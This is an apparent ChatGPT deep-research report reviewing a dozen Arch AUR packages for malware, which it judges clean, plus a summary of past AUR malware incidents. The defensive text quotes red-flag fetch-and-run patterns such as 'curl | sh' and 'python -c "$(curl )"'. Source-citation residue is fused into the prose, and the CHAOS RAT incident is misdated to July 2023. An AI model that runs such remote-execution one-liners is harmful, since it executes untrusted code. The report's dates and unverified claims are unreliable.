Analysis of AUR Packages for Malware

Source:https://chatgpt.com/share/688e978c-dd9c-800a-ac0b-da64888c17ab

Understood. I will analyze the source code of each listed AUR package for signs of suspicious or malicious behavior. This will include reviewing any installation or build scripts for potentially harmful commands, scanning for obfuscated or unnecessary downloads, and checking for known suspicious behavior.I will also review historical and recent user comments on AUR and GitHub repositories to detect any security concerns raised by the community.I’ll begin the deep analysis and let you know once it’s complete.

Overview of Inspected AUR Packages

After reviewing the PKGBUILD files and installation scripts for all listed AUR packages, we found no evidence of malicious code. These packages generally fetch official binaries or source code from trusted upstream URLs and perform standard installation steps. Below is a summary:

  • Brave-Bin: Maintained by Brave’s developers, it downloads the official Brave browser zip from GitHub and installs it. The PKGBUILD shows only standard actions (fetching the release archive, verifying checksums, extracting, and installing to /opt)aur.archlinux.orgaur.archlinux.org. No unwanted scripts or network calls exist beyond the official download.
  • Dropbox: Fetches the official Dropbox Linux client tarball from Dropbox’s servers and verifies it with Dropbox’s PGP keyaur.archlinux.orgaur.archlinux.org. The packaging script simply copies the pre-built .dropbox-dist client into /opt/dropbox and sets up a symlink and systemd serviceaur.archlinux.orgaur.archlinux.org. All URLs and keys correspond to Dropbox’s legitimate sources, and no extra code is executed.
  • Slack-Desktop: Downloads Slack’s official Debian package (.deb) from Slack’s CDN (slack-edge.com) and repackages it for Archaur.archlinux.org. The PKGBUILD extracts the .deb and applies a small patch to fix an icon path (no code execution)aur.archlinux.org. Installation steps are straightforward (placing files under /usr and /opt) and contain nothing suspiciousaur.archlinux.orgaur.archlinux.org.
  • Visual-Studio-Code-Bin: This package is the official Microsoft VS Code binary. The build script pulls tarballs from update.code.visualstudio.com for each architectureaur.archlinux.org and some desktop integration files from Microsoft’s GitHubaur.archlinux.org. The install script simply adds a wrapper (code) to launch the editor with user config flagsaur.archlinux.orgaur.archlinux.org. We saw no anomalous commands – it’s purely installation of Microsoft’s signed binaries.
  • Yay-Bin: The PKGBUILD fetches pre-compiled yay releases from the official GitHub repo (github.com/Jguer/yay)aur.archlinux.org. It then extracts the tarball and installs the yay binary and related files. There are no custom post-install scripts or network actions; it’s packaging exactly the vendor-provided binary. Comments on the AUR page confirm only issues like library version mismatches on ARM, not any security concernsaur.archlinux.org.
  • Sysbox-CE-Bin (and -debug): Downloads the official Sysbox container runtime Debian package from Nestybox’s site and repackages itaur.archlinux.orgaur.archlinux.org. The install script prints a quickstart message (no risky actions)aur.archlinux.orgaur.archlinux.org. The -debug variant is simply the debug-symbol package produced when building with debugging symbols – it contains no extra executables or behavior (just symbols for debugging). Both variants source the same trusted .deb filesaur.archlinux.org.
  • QuickShell: Builds from source (a Qt-based shell toolkit). The PKGBUILD pulls the official source tarball from the developer’s site on Codeberg and uses CMake/Ninja to compile itaur.archlinux.orgaur.archlinux.org. We found no external download commands or obfuscated code. The only extra file is a pacman hook (quickshell-check.hook) which runs quickshell --private-check-compat after Qt is updatedaur.archlinux.org – this is a legitimate post-install check, not malware.
  • Google-Breakpad: Also built from source – it grabs Breakpad’s source from Google’s servers (chromium.googlesource.com)aur.archlinux.org. The PKGBUILD just compiles the code with standard configure && make stepsaur.archlinux.orgaur.archlinux.org. No unusual behavior; this is a simple library package used by QuickShell.
  • Wallust / Wallust-Debug: Wallust (image color palette generator) is built from its Rust crate on crates.ioaur.archlinux.org. The PKGBUILD uses Cargo to fetch dependencies and compile the binaryaur.archlinux.orgaur.archlinux.org. There are no suspicious commands – only Rust build steps. The -debug package again is just debug symbols output by Arch’s build system (not a separate upstream). We saw nothing that would indicate malicious behavior in either variant.
  • Wlrobs-HG / Wlrobs-HG-Debug: Wlrobs is an OBS Studio plugin for Wayland screensharing. The -hg package pulls from the official Mercurial repo on SourceHut (hg.sr.ht/~scoopta/wlrobs)aur.archlinux.orgaur.archlinux.org and builds it with Meson. The build and install steps only compile the plugin and copy the resulting .so to OBS’s plugin directoryaur.archlinux.orgaur.archlinux.org. No extraneous download or execution occurs. The -debug subpackage (if present) would again only contain symbols. User comments on wlrobs-hg discuss build warnings and dependency tweaks, with no hints of any security issuesaur.archlinux.orgaur.archlinux.org.
  • TTF-Victor-Mono: This is a font package. It downloads the Victor Mono font archive from the official GitHub release and installs the .ttf files to /usr/share/fontsaur.archlinux.orgaur.archlinux.org. The only “scripts” here are simple file copy operations. There is nothing that could be malicious – no code is executed at install time besides font registration. In summary, the source code and packaging scripts of all these AUR packages appear clean. We specifically searched for red flags like untrusted curl | sh or python -c ... commands, obfuscated data, or unusual post-install behaviors, and found none. All network fetches are from the expected official domains, and package maintainers often include PGP signature checks or hashes to ensure authenticity (e.g. Dropbox’s keyaur.archlinux.org). The AUR comments for these packages mostly cover version updates or minor build issues, with no reports of malware.

Historical Context on AUR Malware

While the packages in question show no signs of malware, it’s worth noting that the AUR has had isolated incidents of malicious packages in the past (though none of the above were involved). For example, in July 2023 several orphaned AUR packages (named “firefox-patch-bin”, “librewolf-fix-bin”, “zen-browser-patched-bin”) were taken over by an attacker. Their PKGBUILDs were modified to inject a remote access trojan (CHAOS RAT) during install – in that case by pulling code from a malicious GitHub repo under the guise of “patches”www.bleepingcomputer.com. Users quickly noticed the anomaly (the build scripts were cloning an unexpected repository), and Arch Linux staff pulled the compromised packages from AUR. VirusTotal confirmed the dropped payload was a Linux trojanwww.bleepingcomputer.com. Another earlier incident (2018) saw a malicious user add a one-liner like python -c "$(curl )" to a couple of AUR PKGBUILDs, which would execute a script from a third-party server – a clear red flag that was caught and the packages removedwww.bleepingcomputer.com.None of the packages you asked about have any such history of malicious takeover or suspicious code. They are all maintained by trusted users or upstream developers, and the community scrutiny (votes and comments) has not indicated anything amiss. In fact, maintainers of popular packages like yay-bin and visual-studio-code-bin explicitly address user concerns in comments and keep the build process transparent (for instance, explaining differences between the official binary and the open-source build of VSCodeaur.archlinux.org).It’s also important to mention the “-debug” packages you listed (e.g. yay-bin-debug, wlrobs-hg-debug). These are not separate downloads containing new code; they are automatically generated debug symbol packages created by Arch’s build tooling. Starting in 2024, Arch’s default makepkg settings enable debug symbol extraction, so building an AUR package can produce a -debug package with debugging informationforum.endeavouros.comforum.endeavouros.com. These *-debug packages contain no executable payloads – just symbol files – and thus do not introduce malware. The presence of a debug package simply means the main package was built with debug enabled, not that any extra code was run.

Conclusion

After thorough inspection, no suspicious behavior or malware was found in the source or packaging scripts of brave-bin, dropbox, google-breakpad, quickshell, slack-desktop, sysbox-ce-bin (+debug), ttf-victor-mono, visual-studio-code-bin, wallust (+debug), wlrobs-hg (+debug), yay-bin (+debug). Each package only performs expected actions (fetching from official sources, building or installing files) and nothing more. We also cross-checked community reports: there have been no alerts or flags on these packages relating to security. In contrast to the known AUR malware cases (which involved obvious malicious commands in the PKGBUILD), these packages are clean and behave as intended. Nonetheless, it’s good practice to always review AUR build scripts before installation – as demonstrated by the community’s quick discovery of past rogue packageswww.bleepingcomputer.comwww.bleepingcomputer.com – and you’ve done that due diligence here with positive results.Sources: